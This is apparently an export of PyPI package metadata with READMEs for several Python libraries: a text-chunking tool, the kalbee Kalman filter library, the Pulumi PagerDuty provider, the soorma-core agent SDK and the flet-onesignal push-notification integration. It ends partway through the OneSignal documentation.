* LLM 结合 Phase 1 的记忆,告诉系统:“请在 ID 15 处切开,因为这里话题结束了”。
---
## 📄 License
MIT License
| text/markdown | null | Antigravity <assistant@deepmind.com> | null | null | null | null | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Artificial Intelligence"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"pydantic>=2.0.0",
"tenacity>=8.0.0",
"openai>=1.0.0",
"tiktoken>=0.5.0"
] | [] | [] | [] | [
"Homepage, https://github.com/example/ai-chunking",
"Documentation, https://github.com/example/ai-chunking#readme",
"Source, https://github.com/example/ai-chunking"
] | twine/6.2.0 CPython/3.13.5 | 2026-02-20T06:41:44.081955 | ai_chunking_ctk-0.2.8.tar.gz | 31,020 | f9/e9/f7622062d54d23cdc8420392bbd165089735f2056088d421a842404e5a2b/ai_chunking_ctk-0.2.8.tar.gz | source | sdist | null | false | 43ee7cf88318247a678e8dffd6c5ef6e | c54f9d8dc7d3d93c5290412a24820e3c24248b3a6d33ebbc6a6eb84290043c91 | f9e9f7622062d54d23cdc8420392bbd165089735f2056088d421a842404e5a2b | null | [] | 242 |
2.4 | kalbee | 0.2.0 | A clean, modular Python implementation of Kalman Filters and estimation algorithms. | # kalbee 🐝
<div align="center">
<img src="https://raw.githubusercontent.com/MinLee0210/kalbee/main/docs/kalbee.png" alt="kalbee logo" width="300"/>
</div>
<br>
`kalbee` is a clean, modular Python implementation of Kalman Filters and related estimation algorithms. Designed for simplicity and performance, it provides a standard interface for state estimation in various applications.
## ✨ Features
- **8 Filters**: KF, EKF, UKF, Particle, Ensemble, Information, Alpha-Beta-Gamma, Adaptive KF
- **RTS Smoother**: Rauch-Tung-Striebel backward smoother for post-processing
- **Metrics**: RMSE, NEES, NIS, Log-Likelihood for filter diagnostics
- **Experiment Runner**: Compare filters on synthetic signals with one line
- **AutoFilter Factory**: Switch between filters by name
- **Numerical Stability**: Joseph form covariance updates, symmetry enforcement
- **NumPy/SciPy Integration**: Optimized for numerical computations
## 🚀 Installation
```bash
pip install kalbee
```
Or from source:
```bash
git clone https://github.com/MinLee0210/kalbee.git
cd kalbee
pip install -e .
```
## 🛠️ Quick Start
### 1. Standard Kalman Filter
```python
import numpy as np
from kalbee import KalmanFilter
state = np.zeros((2, 1)) # [position, velocity]
cov = np.eye(2)
F = np.array([[1, 1], [0, 1]]) # Constant velocity model
Q = np.eye(2) * 0.01
H = np.array([[1, 0]])
R = np.array([[0.1]])
kf = KalmanFilter(state, cov, F, Q, H, R)
kf.predict()
kf.update(np.array([[1.2]]))
print(f"Estimated State:\n{kf.x}")
```
### 2. Compare Filters with Experiments
```python
from kalbee import run_experiment
report = run_experiment(
signal="sine",
filters=["kf", "ekf", "ukf", "pf"],
noise_std=0.5,
)
print(report.summary())
```
### 3. AutoFilter Factory
```python
from kalbee import AutoFilter
kf = AutoFilter.from_filter(state, cov, F, Q, H, R, mode="kf")
# Available modes: kf, ekf, ukf, abg, pf, enkf, if, akf
```
## 📚 Documentation
Full documentation with theory, code examples, and experiments for each filter:
```bash
pip install mkdocs-material
mkdocs serve
```
- [Getting Started](docs/getting_started.md)
- **Filters**: [KF](docs/filters/kalman_filter.md) · [EKF](docs/filters/extended_kalman_filter.md) · [UKF](docs/filters/unscented_kalman_filter.md) · [PF](docs/filters/particle_filter.md) · [EnKF](docs/filters/ensemble_kalman_filter.md) · [IF](docs/filters/information_filter.md) · [ABG](docs/filters/alpha_beta_gamma_filter.md) · [AKF](docs/filters/adaptive_kalman_filter.md)
- **Features**: [RTS Smoother](docs/features/rts_smoother.md) · [Metrics](docs/features/metrics.md) · [Experiments](docs/features/experiments.md)
- [Architecture](docs/architecture.md)
## 🧪 Testing
```bash
uv run pytest tests/ # 58 tests
```
## 📄 License
This project is licensed under the Apache License 2.0.
## 🤝 Contributing
Contributions are welcome! Please feel free to submit a Pull Request. Check `TODO.md` for ideas.
| text/markdown | null | Le Duc Minh <minh.leduc.0210@gmail.com> | null | Le Duc Minh <minh.leduc.0210@gmail.com> | null | kalman-filter, extended-kalman-filter, ekf, unscented-kalman-filter, ukf, particle-filter, ensemble-kalman-filter, information-filter, state-estimation, sensor-fusion, tracking, alpha-beta-gamma, rts-smoother, adaptive-filter, robotics, signal-processing, python | [] | [] | null | null | >=3.8 | [] | [] | [] | [
"numpy>=1.24.4",
"scipy>=1.10.0",
"pytest>=8.3.5",
"ruff>=0.14.13",
"scikit-learn>=1.3.2"
] | [] | [] | [] | [
"Homepage, https://github.com/MinLee0210/kalbee",
"Repository, https://github.com/MinLee0210/kalbee",
"Documentation, https://minlee0210.github.io/kalbee"
] | twine/6.2.0 CPython/3.10.19 | 2026-02-20T06:40:46.623160 | kalbee-0.2.0.tar.gz | 30,478 | a3/c8/09c2168abace57d7130ece4924ce96b96a7d38ab21f8d89d8211ec133594/kalbee-0.2.0.tar.gz | source | sdist | null | false | 52dc70f808696b1b163cd0c312617d35 | 338f81d6349e87b73cd0393f9a2d4171315738d47b0d3f5fbc13bf3e177b1702 | a3c809c2168abace57d7130ece4924ce96b96a7d38ab21f8d89d8211ec133594 | null | [
"LICENSE"
] | 245 |
2.4 | pulumi-pagerduty | 4.31.0a1771569073 | A Pulumi package for creating and managing pagerduty cloud resources. | [](https://github.com/pulumi/pulumi-pagerduty/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/pagerduty)
[](https://pypi.org/project/pulumi-pagerduty)
[](https://badge.fury.io/nu/pulumi.pagerduty)
[](https://pkg.go.dev/github.com/pulumi/pulumi-pagerduty/sdk/v2/go)
[](https://github.com/pulumi/pulumi-pagerduty/blob/master/LICENSE)
# PagerDuty Resource Provider
The PagerDuty Resource Provider lets you manage PagerDuty resources.
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/pagerduty
or `yarn`:
$ yarn add @pulumi/pagerduty
### Python
To use from Python, install using `pip`:
$ pip install pulumi_pagerduty
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-pagerduty/sdk/v4
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Pagerduty
## Configuration
The following configuration points are available:
- `pagerduty:token` - (Required) The v2 authorization token. It can also be sourced from the `PAGERDUTY_TOKEN`
environment variable. See [API Documentation](https://v2.developer.pagerduty.com/docs/authentication) for more information.
- `pageduty:skipCredentialsValidation` - (Optional) Skip validation of the token against the PagerDuty API.
## Reference
For further information, please visit [the PagerDuty provider docs](https://www.pulumi.com/docs/intro/cloud-providers/pagerduty)
or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/pagerduty).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, pagerduty | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-pagerduty"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:40:31.712019 | pulumi_pagerduty-4.31.0a1771569073.tar.gz | 212,270 | e6/0a/a87dd95c025c5311625a5c86df6d59ed53421ece1912722dd964e2ee330f/pulumi_pagerduty-4.31.0a1771569073.tar.gz | source | sdist | null | false | d2049b37a97935fbf46f6077f94fa054 | 50265a8eeab2a2769856e69748ad0f4db225e9f2f84ff64491514f5668f8e62a | e60aa87dd95c025c5311625a5c86df6d59ed53421ece1912722dd964e2ee330f | null | [] | 199 |
2.4 | soorma-core | 0.7.7 | The Open Source Foundation for AI Agents. Powered by the DisCo (Distributed Cognition) architecture. | # Soorma Core SDK
**The Open Source Foundation for AI Agents.**
Soorma is an agentic infrastructure platform based on the **DisCo (Distributed Cognition)** architecture. It provides a standardized **Control Plane** (Registry, Event Bus, Memory Service) for building production-grade multi-agent systems.
[](https://pypi.org/project/soorma-core/)
[](https://www.python.org/downloads/)
[](https://opensource.org/licenses/MIT)
## 🚧 Status: Day 0 (Pre-Alpha)
We're in active pre-launch refactoring to solidify architecture and APIs before v1.0. The SDK and infrastructure are functional for building multi-agent systems.
**Learn more:** [soorma.ai](https://soorma.ai)
## Installation
> **During Pre-Launch:** We recommend installing from local source to stay synchronized with breaking changes:
```bash
# Clone the repository
git clone https://github.com/soorma-ai/soorma-core.git
cd soorma-core
# Install from source
pip install -e sdk/python
```
> **After v1.0 Release:** Standard PyPI installation will be recommended: `pip install soorma-core`
**Requirements:** Python 3.11+
## Quick Start
> **Note:** Infrastructure runs locally via Docker. Clone the repo to get started.
```bash
# 1. Clone the repository
git clone https://github.com/soorma-ai/soorma-core.git
cd soorma-core
# 2. Start local infrastructure
soorma dev --build
# 3. Run the Hello World example
cd examples/01-hello-world
python worker.py
# 4. In another terminal, send a request
python client.py Alice
```
**Next steps:** See the [Examples Guide](https://github.com/soorma-ai/soorma-core/blob/main/examples/README.md) for a complete learning path.
## Core Concepts
Soorma provides three agent types for building distributed AI systems:
- **Tool** - Synchronous, stateless operations (< 1 second)
- **Worker** - Asynchronous, stateful tasks with delegation
- **Planner** - Strategic reasoning and goal decomposition (Stage 4)
**Platform Services:**
- `context.registry` - Service discovery
- `context.memory` - Distributed state (Semantic, Episodic, Working memory)
- `context.bus` - Event choreography
- `context.tracker` - Observability
**Learn more:** See the [comprehensive documentation](https://github.com/soorma-ai/soorma-core) for architecture details, patterns, and API references.
## Agent Models
### Tool Model (Synchronous)
Tools handle fast, stateless operations that return immediate results:
```python
from soorma import Tool
from soorma.agents.tool import InvocationContext
tool = Tool(name="calculator")
@tool.on_invoke("calculate.add")
async def add_numbers(request: InvocationContext, context):
numbers = request.data["numbers"]
return {"sum": sum(numbers)} # Auto-published to caller
```
**Characteristics:**
- ⚡ **Stateless:** No persistence between calls
- 🚀 **Fast:** Returns immediately (< 1 second)
- 🔄 **Auto-complete:** SDK publishes response automatically
- 📊 **Use cases:** Calculations, lookups, validations
**Example:** [01-hello-tool](https://github.com/soorma-ai/soorma-core/tree/main/examples/01-hello-tool)
### Worker Model (Asynchronous with Delegation)
Workers handle multi-step, stateful tasks with delegation:
```python
from soorma import Worker
from soorma.task_context import TaskContext, ResultContext
worker = Worker(name="order-processor")
@worker.on_task("order.process.requested")
async def process_order(task: TaskContext, context):
# Save state
task.state["order_id"] = task.data["order_id"]
await task.save()
# Delegate to sub-workers
await task.delegate_parallel([
DelegationSpec("inventory.reserve.requested", {...}, "inventory.reserved"),
DelegationSpec("payment.process.requested", {...}, "payment.processed"),
])
@worker.on_result("inventory.reserved")
@worker.on_result("payment.processed")
async def handle_result(result: ResultContext, context):
task = await result.restore_task()
task.update_sub_task_result(result.correlation_id, result.data)
# Complete when all results arrived
if task.aggregate_parallel_results(task.state["group_id"]):
await task.complete({"status": "completed"})
```
**Characteristics:**
- 💾 **Stateful:** TaskContext persists across delegations
- 🔄 **Asynchronous:** Manual completion with `task.complete()`
- 🎯 **Delegation:** Sequential or parallel sub-tasks
- ⚙️ **Use cases:** Workflows, long-running operations, coordination
**Delegation Patterns:**
- **Sequential:** `task.delegate()` - One sub-task at a time
- **Parallel:** `task.delegate_parallel()` - Fan-out with aggregation
- **Multi-level:** Workers can delegate to Workers (arbitrary depth)
**Example:** [08-worker-basic](https://github.com/soorma-ai/soorma-core/tree/main/examples/08-worker-basic)
### Comparison
| Feature | Tool | Worker |
|---------|------|--------|
| Execution | Synchronous | Asynchronous |
| State | Stateless | Stateful (TaskContext) |
| Completion | Auto | Manual (`task.complete()`) |
| Delegation | ❌ No | ✅ Yes |
| Memory I/O | ❌ No | ✅ Yes |
| Latency | < 100ms | Seconds to minutes |
| Example | Calculator | Order processing |
## CLI Reference
| Command | Description |
|---------|-------------|
| `soorma init <name>` | Create a new agent project |
| `soorma dev` | Start local infrastructure |
| `soorma dev --build` | Build and start (first time) |
| `soorma dev --status` | Show infrastructure status |
| `soorma dev --logs` | View infrastructure logs |
| `soorma dev --stop` | Stop infrastructure |
| `soorma dev --stop --clean` | Stop and remove all data |
| `soorma version` | Show SDK version |
The `soorma dev` command runs infrastructure (Registry, NATS, Event Service, Memory Service) in Docker while your agent code runs natively on the host for fast iteration and debugging.
## Documentation & Resources
**📚 Complete Documentation:** [github.com/soorma-ai/soorma-core](https://github.com/soorma-ai/soorma-core)
**Key Guides:**
- [Examples Guide](https://github.com/soorma-ai/soorma-core/blob/main/examples/README.md) - Progressive learning path from hello-world to advanced patterns
- [Developer Guide](https://github.com/soorma-ai/soorma-core/blob/main/docs/DEVELOPER_GUIDE.md) - Development workflows and testing
- [Agent Patterns](https://github.com/soorma-ai/soorma-core/blob/main/docs/agent_patterns/README.md) - Tool, Worker, Planner models and DisCo pattern
- [Event System](https://github.com/soorma-ai/soorma-core/blob/main/docs/event_system/README.md) - Event-driven architecture, topics, messaging
- [Memory System](https://github.com/soorma-ai/soorma-core/blob/main/docs/memory_system/README.md) - CoALA framework and memory types
- [Discovery](https://github.com/soorma-ai/soorma-core/blob/main/docs/discovery/README.md) - Registry and capability discovery
**🎓 Learning Path:**
1. [01-hello-world](https://github.com/soorma-ai/soorma-core/tree/main/examples/01-hello-world) - Basic Worker pattern
2. [02-events-simple](https://github.com/soorma-ai/soorma-core/tree/main/examples/02-events-simple) - Event pub/sub
3. [03-events-structured](https://github.com/soorma-ai/soorma-core/tree/main/examples/03-events-structured) - LLM-based event selection
4. [04-memory-working](https://github.com/soorma-ai/soorma-core/tree/main/examples/04-memory-working) - Workflow state
5. [05-memory-semantic](https://github.com/soorma-ai/soorma-core/tree/main/examples/05-memory-semantic) - RAG patterns
6. [06-memory-episodic](https://github.com/soorma-ai/soorma-core/tree/main/examples/06-memory-episodic) - Multi-agent chatbot
## Contributing & Support
- **Repository:** [github.com/soorma-ai/soorma-core](https://github.com/soorma-ai/soorma-core)
- **Issues:** [Report bugs or request features](https://github.com/soorma-ai/soorma-core/issues)
- **Discussions:** [Ask questions](https://github.com/soorma-ai/soorma-core/discussions)
- **Changelog:** [Release notes](https://github.com/soorma-ai/soorma-core/blob/main/CHANGELOG.md)
## License
MIT License - see [LICENSE](https://github.com/soorma-ai/soorma-core/blob/main/LICENSE) for details.
| text/markdown | Soorma AI | founders@soorma.ai | null | null | MIT | ai, agents, disco, distributed-systems, llm, orchestration | [
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Software Development :: Libraries :: Application Frameworks"
] | [] | null | null | <4.0,>=3.11 | [] | [] | [] | [
"httpx>=0.26.0",
"pydantic<3.0.0,>=2.0.0",
"rich>=10.11.0",
"soorma-common>=0.7.0",
"typer>=0.13.0"
] | [] | [] | [] | [
"Homepage, https://soorma.ai",
"Repository, https://github.com/soorma-ai/soorma-core"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:40:17.743782 | soorma_core-0.7.7.tar.gz | 71,648 | 3a/a9/ed117ef1e13badef01538b2b23b44f26e1c1aa6611c67dd34462d929a5dd/soorma_core-0.7.7.tar.gz | source | sdist | null | false | 6d7f1773773d50b60fc556fe966e8518 | 79a9a59cbcca893d74699aa2c2820224294c22e762e89750dc5eb4f0aa887039 | 3aa9ed117ef1e13badef01538b2b23b44f26e1c1aa6611c67dd34462d929a5dd | null | [
"LICENSE.txt"
] | 226 |
2.4 | flet-onesignal | 0.4.3 | Flutter OneSignal package integration for Python Flet. | <p align="center"><img src="https://github.com/user-attachments/assets/ee3f4caf-10a7-4c58-948d-6a59fda97850" width="300" height="150" alt="Flet OneSignal"></p>
<h1 align="center">Flet OneSignal</h1>
<p align="center">
<strong>OneSignal SDK integration for Flet applications</strong>
</p>
<p align="center">
<a href="https://github.com/brunobrown/flet-asp/blob/main/LICENSE" target="_blank">
<img src="https://img.shields.io/badge/license-MIT-green?style=flat" alt="License">
</a>
<a href="https://github.com/brunobrown/flet-onesignal/actions?query=workflow%3AMain+event%3Apush+branch%3Amain" target="_blank">
<img src="https://github.com/brunobrown/flet-onesignal/actions/workflows/main.yml/badge.svg?event=push&branch=main" alt="Main">
</a>
<a href="https://github.com/brunobrown/flet-onesignal/actions?query=workflow%3ADev+event%3Apush+branch%3ADev" target="_blank">
<img src="https://github.com/brunobrown/flet-onesignal/actions/workflows/dev.yml/badge.svg?event=push&branch=dev" alt="Dev">
</a>
<a href="https://pypi.org/project/flet-onesignal" target="_blank">
<img src="https://img.shields.io/pypi/v/flet-onesignal?color=%2334D058&label=pypi%20package" alt="Package version">
</a>
<a href="https://pypi.org/project/flet-onesignal" target="_blank">
<img src="https://img.shields.io/pypi/pyversions/flet-onesignal.svg?color=%2334D058" alt="Supported Python versions">
</a>
<a href="https://pepy.tech/projects/flet-onesignal"><img src="https://static.pepy.tech/personalized-badge/flet-onesignal?period=monthly&units=INTERNATIONAL_SYSTEM&left_color=GREY&right_color=BLUE&left_text=downloads%2Fmonth" alt="PyPI Downloads">
</a>
<a href="https://brunobrown.github.io/flet-onesignal" target="_blank">
<img src="https://img.shields.io/badge/docs-mkdocs-blue" alt="Documentation">
</a>
</p>
---
- [Installation](#installation)
- [Quick Start](#quick-start)
- [API Reference](#api-reference)
## Overview
**Flet OneSignal** is an extension that integrates the [OneSignal Flutter SDK](https://documentation.onesignal.com/docs/en/flutter-sdk-setup) with [Flet](https://flet.dev) applications. It provides a complete Python API for:
- [Push Notifications](#push-notifications) — send and receive on iOS and Android ([OneSignal Docs](https://documentation.onesignal.com/docs/en/push))
- [In-App Messages](#in-app-messages) — targeted messages within your app ([OneSignal Docs](https://documentation.onesignal.com/docs/en/in-app-messages-setup))
- [User Management](#user-management) — identity, tags, aliases, email, SMS ([OneSignal Docs](https://documentation.onesignal.com/docs/en/users))
- [Location](#location) — geo-targeted messaging ([OneSignal Docs](https://documentation.onesignal.com/docs/en/location-opt-in-prompt))
- [Outcomes](#outcomes) — track actions and conversions ([OneSignal Docs](https://documentation.onesignal.com/docs/en/custom-outcomes))
- [Live Activities](#live-activities-ios) — iOS real-time updates (iOS 16.1+) ([OneSignal Docs](https://documentation.onesignal.com/docs/en/live-activities))
- [Privacy & Consent](#privacy--consent) — GDPR compliance ([OneSignal Docs](https://documentation.onesignal.com/docs/en/handling-personal-data))
- [Debugging](#debugging) — log levels and error handling
> **Version 0.4.0** - Built for Flet 0.80.x with a modular architecture that mirrors the OneSignal SDK structure.
---
## Buy Me a Coffee
If you find this project useful, please consider supporting its development:
<a href="https://www.buymeacoffee.com/brunobrown">
<img src="https://www.buymeacoffee.com/assets/img/guidelines/download-assets-sm-1.svg" width="200" alt="Buy Me a Coffee">
</a>
---
## Requirements
| Component | Minimum Version |
|-----------|-----------------|
| Python | 3.10+ |
| Flet | 0.80.x+ |
### Platform Requirements
| Platform | Minimum Version | Notes |
|----------|-----------------|-------|
| **iOS** | 12.0+ | Requires Xcode 14+ |
| **Android** | API 24 (Android 7.0)+ | Requires `compileSdkVersion 33+` |
---
## Installation
### Step 1: Install the Package
Choose your preferred package manager:
```bash
# Using UV (Recommended)
uv add flet-onesignal
# Using pip
pip install flet-onesignal
# Using Poetry
poetry add flet-onesignal
```
### Step 2: Configure pyproject.toml
Add the dependency to your project configuration:
```toml
[project]
name = "my-flet-app"
version = "1.0.0"
requires-python = ">=3.10"
dependencies = [
"flet>=0.80.5",
"flet-onesignal>=0.4.0",
]
[tool.flet.app]
path = "src"
```
### Step 3: OneSignal Dashboard Setup (Android)
1. Create an account at [OneSignal.com](https://onesignal.com), then click **+ Create** > **New App**.
2. Enter your **App Name**, select the organization, choose **Google Android (FCM)** as the channel, and click **Next: Configure Your Platform**.

3. Upload your **Service Account JSON** file. To generate it, go to the [Firebase Console](https://console.firebase.google.com) > **Project Settings** > **Service accounts** > **Generate new private key**. See the [OneSignal Android credentials guide](https://documentation.onesignal.com/docs/en/android-firebase-credentials) for detailed instructions. Click **Save & Continue**.

4. Select **Flutter** as the target SDK, then click **Save & Continue**.

5. Copy the **App ID** displayed on the screen and click **Done**. You will use this ID in your Flet app.

### Step 4: iOS Configuration
1. Enable **Push Notifications** capability in Xcode
2. Enable **Background Modes** > Remote notifications
3. Add your APNs certificate to the OneSignal dashboard
---
## Quick Start
```python
import flet as ft
import flet_onesignal as fos
# Your OneSignal App ID from the dashboard
ONESIGNAL_APP_ID = "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"
async def main(page: ft.Page):
page.title = "My App"
# Initialize OneSignal
onesignal = fos.OneSignal(
app_id=ONESIGNAL_APP_ID,
log_level=fos.OSLogLevel.DEBUG, # Enable debug logging
)
# Add to page services (required for Flet 0.80.x services)
page.services.append(onesignal)
# Request notification permission
permission_granted = await onesignal.notifications.request_permission()
print(f"Notification permission: {permission_granted}")
# Identify the user (optional but recommended)
await onesignal.login("user_12345")
page.add(ft.Text("OneSignal is ready!"))
if __name__ == "__main__":
ft.run(main)
```
> **Note:** `OneSignal` is a **service**, not a visual control. You must add it using `page.services.append(onesignal)` — **not** `page.overlay.append(onesignal)`. Using `overlay` will not initialize the SDK correctly.
---
## Architecture
The SDK follows a modular architecture that mirrors the official OneSignal SDK:
```
fos.OneSignal
│
├── .debug # Logging and debugging
├── .user # User identity, tags, aliases, email, SMS
├── .notifications # Push notification management
├── .in_app_messages # In-app message triggers and lifecycle
├── .location # Location sharing (optional)
├── .session # Outcomes and analytics
└── .live_activities # iOS Live Activities (iOS 16.1+)
```
Each module provides focused functionality and can be accessed as a property of the main `OneSignal` instance.
---
## User Management
### Login and Logout
Associate users with their account in your system using an **External User ID**:
```python
# Login - Associates the device with your user ID
await onesignal.login("user_12345")
# Logout - Removes the association, creates anonymous user
await onesignal.logout()
```
> **Best Practice:** Call `login()` when the user signs into your app and `logout()` when they sign out.
### Get User IDs
```python
# Get the OneSignal-generated user ID
onesignal_id = await onesignal.user.get_onesignal_id()
print(f"OneSignal ID: {onesignal_id}")
# Get the External User ID (set via login)
external_id = await onesignal.user.get_external_id()
print(f"External ID: {external_id}")
```
### Tags
Tags are key-value pairs used for segmentation and personalization:
```python
# Add a single tag
await onesignal.user.add_tag("subscription_type", "premium")
# Add multiple tags at once
await onesignal.user.add_tags({
"favorite_team": "barcelona",
"notification_frequency": "daily",
"app_version": "2.1.0",
})
# Remove a tag
await onesignal.user.remove_tag("old_tag")
# Remove multiple tags
await onesignal.user.remove_tags(["tag1", "tag2", "tag3"])
# Get all tags
tags = await onesignal.user.get_tags()
print(f"User tags: {tags}")
```
### Aliases
Aliases allow you to associate multiple identifiers with a single user:
```python
# Add an alias (e.g., CRM ID, database ID)
await onesignal.user.add_alias("crm_id", "CRM_98765")
# Add multiple aliases
await onesignal.user.add_aliases({
"database_id": "DB_12345",
"analytics_id": "GA_67890",
})
# Remove an alias
await onesignal.user.remove_alias("old_alias")
```
### Email Subscriptions
Add email addresses for omnichannel messaging:
```python
# Add an email subscription
await onesignal.user.add_email("user@example.com")
# Remove an email subscription
await onesignal.user.remove_email("user@example.com")
```
### SMS Subscriptions
Add phone numbers for SMS messaging (use E.164 format):
```python
# Add SMS subscription (E.164 format: +[country code][number])
await onesignal.user.add_sms("+5511999999999")
# Remove SMS subscription
await onesignal.user.remove_sms("+5511999999999")
```
### Language
Set the user's preferred language for localized notifications:
```python
# Set language using ISO 639-1 code
await onesignal.user.set_language("pt") # Portuguese
await onesignal.user.set_language("es") # Spanish
await onesignal.user.set_language("en") # English
# You can also use the Language enum for auto-complete support
await onesignal.user.set_language(fos.Language.PORTUGUESE.value)
await onesignal.user.set_language(fos.Language.SPANISH.value)
```
---
## Push Notifications
### Requesting Permission
You must request permission before sending push notifications:
```python
# Request permission with fallback to settings
granted = await onesignal.notifications.request_permission(
fallback_to_settings=True # Opens settings if previously denied
)
if granted:
print("User granted notification permission!")
else:
print("User denied notification permission")
```
### Check Permission Status
```python
# Check if permission can be requested (not yet prompted)
can_request = await onesignal.notifications.can_request_permission()
# Check current permission status
has_permission = await onesignal.notifications.get_permission()
```
### iOS Provisional Authorization
Request provisional (quiet) authorization on iOS 12+:
```python
# Notifications will be delivered quietly to Notification Center
authorized = await onesignal.notifications.register_for_provisional_authorization()
```
### Managing Notifications
```python
# Clear all notifications from the notification center
await onesignal.notifications.clear_all()
# Remove a specific notification (Android only)
await onesignal.notifications.remove_notification(notification_id)
# Remove a group of notifications (Android only)
await onesignal.notifications.remove_grouped_notifications("group_key")
```
### Foreground Display Control
Control whether notifications are shown when the app is in the foreground:
```python
# Inside on_notification_foreground handler:
# Prevent a notification from being displayed
await onesignal.notifications.prevent_default(e.notification_id)
# Later, allow display if needed
await onesignal.notifications.display(e.notification_id)
```
### Push Subscription Control
```python
# Opt user into push notifications
await onesignal.user.opt_in_push()
# Opt user out of push notifications
await onesignal.user.opt_out_push()
# Check if user is opted in
is_opted_in = await onesignal.user.is_push_opted_in()
# Get push subscription details
subscription_id = await onesignal.user.get_push_subscription_id()
push_token = await onesignal.user.get_push_subscription_token()
```
### Handling Notification Events
```python
def on_notification_click(e: fos.OSNotificationClickEvent):
"""Called when user taps on a notification."""
print(f"Notification clicked: {e.notification}")
print(f"Action ID: {e.action_id}") # If action buttons were used
def on_notification_foreground(e: fos.OSNotificationWillDisplayEvent):
"""Called when notification received while app is in foreground."""
print(f"Notification received: {e.notification}")
print(f"Notification ID: {e.notification_id}")
# Optionally prevent display and handle manually:
# await onesignal.notifications.prevent_default(e.notification_id)
# Later, allow display if needed:
# await onesignal.notifications.display(e.notification_id)
def on_permission_change(e: fos.OSPermissionChangeEvent):
"""Called when notification permission status changes."""
print(f"Permission granted: {e.permission}")
# Register handlers when creating OneSignal instance
onesignal = fos.OneSignal(
app_id=ONESIGNAL_APP_ID,
on_notification_click=on_notification_click,
on_notification_foreground=on_notification_foreground,
on_permission_change=on_permission_change,
)
```
---
## In-App Messages
In-App Messages (IAMs) are messages displayed within your app based on triggers.
### Triggers
Triggers determine when IAMs are displayed:
```python
# Add a trigger
await onesignal.in_app_messages.add_trigger("level_completed", "5")
# Add multiple triggers
await onesignal.in_app_messages.add_triggers({
"screen": "checkout",
"cart_value": "50",
})
# Remove a trigger
await onesignal.in_app_messages.remove_trigger("old_trigger")
# Remove multiple triggers
await onesignal.in_app_messages.remove_triggers(["trigger1", "trigger2"])
# Clear all triggers
await onesignal.in_app_messages.clear_triggers()
```
### Pausing In-App Messages
Temporarily prevent IAMs from displaying:
```python
# Pause IAM display
await onesignal.in_app_messages.pause()
# Resume IAM display
await onesignal.in_app_messages.resume()
# Check if paused
is_paused = await onesignal.in_app_messages.is_paused()
```
### IAM Event Handlers
```python
def on_iam_click(e: fos.OSInAppMessageClickEvent):
"""Called when user interacts with an IAM."""
print(f"IAM clicked - Action: {e.result.action_id}")
print(f"URL: {e.result.url}")
print(f"Closing message: {e.result.closing_message}")
def on_iam_will_display(e: fos.OSInAppMessageWillDisplayEvent):
"""Called before an IAM is displayed."""
print(f"IAM will display: {e.message}")
def on_iam_did_display(e: fos.OSInAppMessageDidDisplayEvent):
"""Called after an IAM is displayed."""
print("IAM displayed")
def on_iam_will_dismiss(e: fos.OSInAppMessageWillDismissEvent):
"""Called before an IAM is dismissed."""
print("IAM will dismiss")
def on_iam_did_dismiss(e: fos.OSInAppMessageDidDismissEvent):
"""Called after an IAM is dismissed."""
print("IAM dismissed")
onesignal = fos.OneSignal(
app_id=ONESIGNAL_APP_ID,
on_iam_click=on_iam_click,
on_iam_will_display=on_iam_will_display,
on_iam_did_display=on_iam_did_display,
on_iam_will_dismiss=on_iam_will_dismiss,
on_iam_did_dismiss=on_iam_did_dismiss,
)
```
---
## Location
Share user location for geo-targeted messaging:
```python
# Request location permission
granted = await onesignal.location.request_permission()
# Enable location sharing
await onesignal.location.set_shared(True)
# Disable location sharing
await onesignal.location.set_shared(False)
# Check if location is being shared
is_shared = await onesignal.location.is_shared()
```
### Android Setup
On Android, the OneSignal Location module is **not included by default**. Without it, `set_shared(True)` will log `no location dependency found` and location will not work.
To enable it, you need to build your app using the `fos-build` CLI, which automatically injects the required Gradle dependencies (`com.onesignal:location`, `play-services-location`, and ProGuard rules).
**1. Install the CLI:**
```bash
# Using UV (Recommended)
uv add flet-onesignal[cli]
# Using pip
pip install flet-onesignal[cli]
# Using Poetry
poetry add flet-onesignal[cli]
```
**2. Add location permissions** to your `pyproject.toml`:
```toml
# pyproject.toml
[tool.flet.android]
permission."android.permission.ACCESS_FINE_LOCATION" = true
permission."android.permission.ACCESS_COARSE_LOCATION" = true
```
These permissions are required in the Android Manifest for the app to access the device's GPS. `ACCESS_FINE_LOCATION` enables precise GPS positioning, while `ACCESS_COARSE_LOCATION` enables approximate location via Wi-Fi/cell towers. Without them, the system will deny location access at runtime even if the user grants permission in the dialog.
**3. Enable the OneSignal Location module** via `pyproject.toml` or CLI flag:
```toml
# pyproject.toml
[tool.flet.onesignal.android]
location = true
```
```bash
# Or pass the flag directly
fos-build apk --location
```
**4. Build with `fos-build`:**
```bash
fos-build apk
```
> **Note:** Using `flet build apk` directly (without `fos-build`) will **not** inject the location module and the feature will silently fail at runtime.
---
## Outcomes
Track user actions and conversions attributed to notifications:
```python
# Track a simple outcome
await onesignal.session.add_outcome("product_viewed")
# Track a unique outcome (counted once per notification)
await onesignal.session.add_unique_outcome("app_opened")
